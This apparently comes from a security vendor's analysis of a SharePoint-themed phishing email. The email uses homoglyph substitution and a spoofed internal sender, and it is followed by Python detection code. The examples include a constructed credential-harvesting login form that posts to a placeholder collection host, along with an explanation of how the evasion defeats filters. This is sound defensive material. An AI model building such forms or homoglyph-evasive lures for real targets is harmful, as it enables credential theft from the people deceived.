In this attack, a company executive was targeted with an email posing as a SharePoint share notification for documents that required their review. The email claims the shared documents are the previous month's financial statements and that they can be accessed by opening the “attached SharePoint link.” Throughout the body of the email, the attacker substituted multiple Latin letters with look-alike Cyrillic and Armenian characters. The email was sent from an address spoofed to look like an internal account; the local part of the spoofed address was “accounting,” matching the financial theme of the message.

Financial Document Phishing Email

An HTML file was attached to the email. When opened, it rendered a webpage mimicking a Microsoft login page, prefilled with the recipient's email address. The page told the recipient to enter their account password in order to view the financial documents.

Financial Document Phishing Page

Why It Bypassed Traditional Security

The attacker replaced Latin letters with look-alike foreign characters, so detection tools that match known malicious text strings never see the phrases they are looking for: the bytes on the wire differ from the words a human reads. The URL inside the attachment had never been observed as malicious, so tools that rely on known-bad indicators had nothing to match. Finally, the spoofed domain had no enforcing DMARC policy instructing receiving servers to reject unauthorized senders using addresses on the domain, so the spoofed internal sender was accepted.
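As an added example (not code from the original page or from any vendor), the following Python shows how a detection rule can catch the character substitution described above. It flags single words whose letters come from more than one Unicode script, and folds a small, hand-picked table of confusable characters back to Latin before keyword matching, so a rule looking for “sharepoint” or “financial” fires even when the attacker has swapped letters. The sample sentence and the confusable table are constructed for this example; a production rule would load the full confusables.txt from Unicode TR39.

```python
import unicodedata

# Hand-picked subset of Unicode confusables (Cyrillic and Armenian letters that
# render like Latin ones). This is an assumption for the example; a production
# rule would load the full confusables.txt from Unicode TR39.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
    "\u0585": "o", "\u0570": "h", "\u0578": "n", "\u057d": "u",
}

# Constructed sample in the style of the email described above (not the real
# email): four words carry Cyrillic (U+0430, U+0435) or Armenian (U+0585) letters.
SAMPLE = ("Please r\u0435view the \u0430ttached Sh\u0430reP\u0585int link "
          "for last month's fin\u0430ncial statements")


def script_of(ch):
    """Unicode script family of a letter ('LATIN', 'CYRILLIC', ...); '' for non-letters."""
    if not ch.isalpha():
        return ""
    try:
        return unicodedata.name(ch).split()[0]
    except ValueError:
        return "UNKNOWN"


def mixed_script_words(text):
    """Words whose letters come from more than one script: the signature of homoglyph substitution.

    Returns a list of (word, sorted list of scripts)."""
    flagged = []
    for word in text.split():
        scripts = {script_of(c) for c in word} - {""}
        if len(scripts) > 1:
            flagged.append((word, sorted(scripts)))
    return flagged


def skeleton(text):
    """Fold confusable characters back to their Latin look-alikes."""
    return "".join(CONFUSABLES.get(c, c) for c in text)


def evasion_hits(text, keywords):
    """Keywords that match only after folding: each one is a string rule the raw text bypassed."""
    raw, folded = text.casefold(), skeleton(text).casefold()
    return [k for k in keywords if k in folded and k not in raw]


if __name__ == "__main__":
    for word, scripts in mixed_script_words(SAMPLE):
        print(f"{word!r}: {'+'.join(scripts)}")
    print("normalized:", skeleton(SAMPLE))
    print("bypassed rules:", evasion_hits(SAMPLE, ["sharepoint", "financial", "review", "link"]))
```

The strong signal is a mix of scripts inside a single word; a message that is legitimately bilingual mixes scripts across words, not within them. Feeding the folded text, rather than the raw body, into keyword and URL rules is what restores the matches the substitution was designed to defeat.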

Detecting the Attack

HTML attachments are commonly used to deliver phishing payloads without placing the malicious content in the email body, where it would be scanned most closely. Analysis of the HTML file identified a URL that had not previously been flagged as malicious. A cloud email security platform can still detect the email from the link's intent (a page that imitates a Microsoft login and asks for the password) together with other signals gathered through content analysis. The email also failed SPF checks, indicating the sending address was likely spoofed.
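To make the two checks above concrete, here is an added example that is not code from the page or from any vendor product. It parses a constructed HTML attachment for a login form, a password field, a prefilled identity and the hosts the page talks to, and reads the SPF, DKIM and DMARC verdicts from a constructed Authentication-Results header. The hostnames (collect.example.invalid, cdn.example.invalid, victim.example) and the header contents are placeholders invented for the example, not indicators from the real attack.

```python
import re
from email import message_from_string
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample HTML attachment in the style the page describes: a fake
# sign-in form with the recipient's address prefilled. All hostnames are
# placeholders (RFC 2606 reserved names), not indicators from the real attack.
SAMPLE_HTML = """<html><body>
<h2>Sign in to view shared documents</h2>
<form method="POST" action="https://collect.example.invalid/auth/login.php">
  <input type="email" name="username" value="ceo@victim.example">
  <input type="password" name="password">
  <button type="submit">Sign in</button>
</form>
<script src="https://cdn.example.invalid/brand.js"></script>
</body></html>"""

# Constructed headers as a receiving MTA might stamp them (RFC 8601 format).
SAMPLE_HEADERS = """Authentication-Results: mx.victim.example;
 spf=fail (sender IP is 203.0.113.5) smtp.mailfrom=accounting@victim.example;
 dkim=none; dmarc=fail header.from=victim.example
From: accounting@victim.example
Subject: Financial statements for last month

"""


class CredentialFormParser(HTMLParser):
    """Collect form targets, password inputs, prefilled identities and remote resource URLs."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.prefilled = []
        self.remote_urls = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])
        if tag == "input":
            kind = a.get("type", "").lower()
            if kind == "password":
                self.password_fields += 1
            if kind == "email" and a.get("value"):
                self.prefilled.append(a["value"])
        for key in ("src", "href", "action"):
            if a.get(key, "").startswith(("http://", "https://")):
                self.remote_urls.append(a[key])


def analyze_attachment(html):
    """Summarize what the attachment does when rendered."""
    p = CredentialFormParser()
    p.feed(html)
    hosts = {urlparse(u).hostname for u in p.form_actions + p.remote_urls}
    return {
        "credential_form": bool(p.form_actions) and p.password_fields > 0,
        "form_actions": p.form_actions,
        "prefilled_identities": p.prefilled,
        "external_hosts": sorted(h for h in hosts if h),
    }


def auth_results(raw_headers):
    """Extract spf/dkim/dmarc verdicts from the Authentication-Results header."""
    msg = message_from_string(raw_headers)
    header = msg.get("Authentication-Results", "")
    return dict(re.findall(r"\b(spf|dkim|dmarc)=(\w+)", header))


def verdict(html, raw_headers):
    """Reasons to treat the message as credential phishing; an empty list means no finding."""
    reasons = []
    found = analyze_attachment(html)
    if found["credential_form"]:
        reasons.append("attachment renders a login form posting to " + ", ".join(found["form_actions"]))
    if found["prefilled_identities"]:
        reasons.append("recipient identity prefilled: " + ", ".join(found["prefilled_identities"]))
    auth = auth_results(raw_headers)
    if auth.get("spf") == "fail":
        reasons.append("SPF failed for the claimed internal sender")
    if auth.get("dmarc") != "pass":
        reasons.append("From: domain not backed by a DMARC pass")
    return reasons


if __name__ == "__main__":
    for r in verdict(SAMPLE_HTML, SAMPLE_HEADERS):
        print("-", r)
```

The structural check here (a password field inside a form that posts to a host the page never names as the brand it imitates) is a stand-in for what the page calls the link's intent; it works on a URL with no prior reputation because it does not need one. Pair it with the authentication results: an SPF failure on a message whose From: claims an internal address is the spoofing signal, and the absence of a DMARC pass is why the receiving server accepted it anyway.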

Risk to Organization

Because the sender's address was spoofed to impersonate an internal account, an employee receiving the email may comply instinctively, since it appears to come from a trusted source. If the employee entered credentials into the phishing page, the attacker would gain the same access to the email account as its owner, which could then be used to search for sensitive information or as a launch point for further attacks on the employee's coworkers, customers, or vendors.

Analysis Overview

Vector: Payload-based

Goal: Credential Theft

Tactic: Foreign Character Substitution; Spoofed Email Address

Theme: Fake Document

Impersonated Brands: SharePoint
